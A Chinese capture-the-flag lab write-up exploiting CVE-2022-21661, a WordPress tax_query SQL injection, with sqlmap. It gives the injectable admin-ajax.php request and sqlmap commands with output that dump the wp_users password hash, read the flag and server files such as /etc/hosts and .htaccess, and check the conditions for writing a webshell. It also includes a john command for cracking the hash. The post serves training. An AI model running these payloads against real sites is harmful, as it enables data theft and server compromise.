春秋云境CVE-2022-21661,sqlmap+json一把梭哈

ops/2024/10/30 12:33:33/

网址:

https://yunjing.ichunqiu.com/
https://yunjing.ichunqiu.com/cve/detail/1026?pay=2

sqlmap启动参数:  

set cmdpath2024=c:\Python310\python%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="23)  " --suffix="#" --threads=4  --current-db --is-dba --dbs  --proxy=http://127.0.0.1:8080# sqlmap {1.6.2.4#dev}  ,  支持python3.10
#http://127.0.0.1:8080/  是burpsuite 2022起的http代理,方便观察.

./rr2024.txt  内容如下:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze8beum9sog31ctu6to.cloudeci1.ichunqiu.com
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: closeaction=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}

#如下命令,查看cms数据库的表
%cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="23)  " --suffix="#" --threads=4  -D cms --tables --proxy=http://127.0.0.1:8080#如下命令,查看cms数据库的wp_users表的字段有哪些
%cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  -D cms  -T wp_users --columns  --proxy=http://127.0.0.1:8080#如下命令,导出cms数据库的wp_users表的某字段(user_login,user_nicename,user_pass)
%cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  -D cms -T wp_users -C "user_login,user_nicename,user_pass" --dump --proxy=http://127.0.0.1:8080

back-end DBMS: MySQL >= 5.0.0
current database: 'cms'
[23:20:12] [INFO] retrieved: 'root@localhost'
current user is DBA: True 
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sysDatabase: cms
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+Database: cms
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+Database: cms
Table: wp_users
[1 entry]
+-----------------+-----------------+------------------------------------+
| user_login      | user_nicename   | user_pass                          |
+-----------------+-----------------+------------------------------------+
| adminadminadmin | adminadminadmin | $P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0 |
+-----------------+-----------------+------------------------------------+

john破解失败:

echo 'adminadminadmin:$P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0'>./hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass ./hashes.txt

get flag:

#如下命令,get flag
%cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  --file-read="/flag" --proxy=http://127.0.0.1:8080

运行结果:

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)Type: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)Payload: action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["12)  AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
[19:52:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:52:58] [INFO] fingerprinting the back-end DBMS operating system
[19:53:01] [INFO] the back-end DBMS operating system is Linux
[19:53:01] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[19:53:01] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2ze420okq7lq6jfkcesm.cloudeci1.ichunqiu.com\files\_flag
flag{d77546af-4520-4cf4-a200-94a365ce05be}

写webshell的条件探测:

 %cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  --sql-query "SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir)"  --proxy=http://127.0.0.1:8080

输出:

SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir): '2024-10-29 12:16:47~5.7.39-0ubuntu0.18.04.2~~/usr/lib/mysql/plugin/'

读取/etc/hosts文件(假的站库分离):

# eci-managed hosts file.
127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
fe00::0	ip6-mcastprefix
fe00::1	ip6-allnodes
fe00::2	ip6-allrouters
10.9.118.207	engine-2

读取/etc/my.cnf文件不存在

读取/etc/resolv.conf文件:

nameserver 100.100.2.136
nameserver 100.100.2.138

/var/www/html/wp-admin/profile.php   283字节
/var/www/html/.htaccess 261字节
/var/www/html/index.php   26字节
/var/www/html/wp-admin/admin-functions.php  406字节
/var/www/html/wp-admin/admin-ajax.php  4.83 KB (4,948 字节)
 

/var/www/html/wp-admin/admin-ajax.php

[22:28:48] [DEBUG] performed 472 queries in 1455.96 seconds
do you want confirmation that the remote file '/var/www/html/wp-admin/admin-ajax.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:28:48] [DEBUG] used the default behavior, running in batch mode
[22:28:48] [DEBUG] checking the length of the remote file '/var/www/html/wp-admin/admin-ajax.php'
[22:28:48] [PAYLOAD] 2)  AND EXTRACTVALUE(9473,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f77702d61646d696e2f61646d696e2d616a61782e706870)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:28:50] [INFO] retrieved: '4948'
[22:28:50] [DEBUG] performed 1 query in 2.26 seconds
[22:28:50] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php' and the remote file '/var/www/html/wp-admin/admin-ajax.php' have the same size (4948 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php (same file)

探测 /var/www/html/.htaccess

[22:31:50] [DEBUG] performed 25 queries in 71.15 seconds
do you want confirmation that the remote file '/var/www/html/.htaccess' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:31:50] [DEBUG] used the default behavior, running in batch mode
[22:31:50] [DEBUG] checking the length of the remote file '/var/www/html/.htaccess'
[22:31:50] [PAYLOAD] 2)  AND EXTRACTVALUE(7365,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f2e6874616363657373)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:31:52] [INFO] retrieved: '261'
[22:31:52] [DEBUG] performed 1 query in 2.24 seconds
[22:31:52] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess' and the remote file '/var/www/html/.htaccess' have the same size (261 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess (same file)

/var/www/html/.htaccess 的内容 


# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.# END WordPress


http://www.ppmy.cn/ops/129583.html

相关文章

Apache paimon-CDC

CDC集成 paimon支持五种方式通过模式转化数据提取到paimon表中。添加的列会实时同步到Paimon表中 MySQL同步表:将MySQL中的一张或多张表同步到一张Paimon表中。MySQL同步数据库:将MySQL的整个数据库同步到一个Paimon数据库中。API同步表:将您的自定义DataStream输入同步到一…

QT中使用图表之QChart绘制曲线图

步骤和绘制折线图一模一样,只不过使用的系列是曲线系列QSplineSeries 不过我们也可以不用自己来创建轴 而是先把曲线系列创建好并添加到图表中之后 ----------------------------------------------------------------------------------------------------------…

UDP组播测试

支持组播的接口: ip a | grep MULTICAST 环回接口虽然显示不支持组播,实际也可以用于本地测试。 添加路由(非必须?): ip route add 239.0.0.0/24 via 10.10.10.206 dev eth0 开放防火墙: 查…

qt配置https请求

qt配置https请求 老套路,一图胜千言,在ui界面请求搜狗,看看能返回什么内容 平台信息 - 开发机操作系统 【win11】 - qt版本 【5.13.2 】 - 编译器 【Mingw32(qt自带安装) 】 - 目标平台【win32】,win7及win7以上x86/64 windows…

论文略读:AnyGPT: Unified Multimodal LLM with Discrete Sequence Modeling

ACL 2024 在单一框架内整个多个模态 采用离散表示来统一处理文本、各种模态、图像和音乐

SpringBoot3使用MyBatisPlus时遇到的问题 Invalid bean definition with name

问题&#xff1a; 运行springboot3项目报错&#xff1a;Invalid bean definition with name ‘XXXMapper’ defined in file… 原因&#xff1a;springboot3支持的mabits-plus依赖不同导致的 解决办法&#xff1a; 修改为&#xff1a; <dependency><groupId>com…

10.24.2024刷华为OD C题型(四) -- 对象list按照多个属性排序

文章目录 最长连续子序列AI面板识别语法知识记录 最长连续子序列 https://www.nowcoder.com/discuss/592408743019589632 if __name__ "__main__":# 获取用户输入# numbers int(input().split(,))# str_arr input().split(,)arr [int(num) for num in input(…

C#判断点是否在矩形内

前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家&#xff01;人工智能学习网站 前言&#xff1a; 大家好&#xff0c;我是上位机马工&#xff0c;硕士毕业4年年入40万&#xff0c;目前在一家自动化公司担任…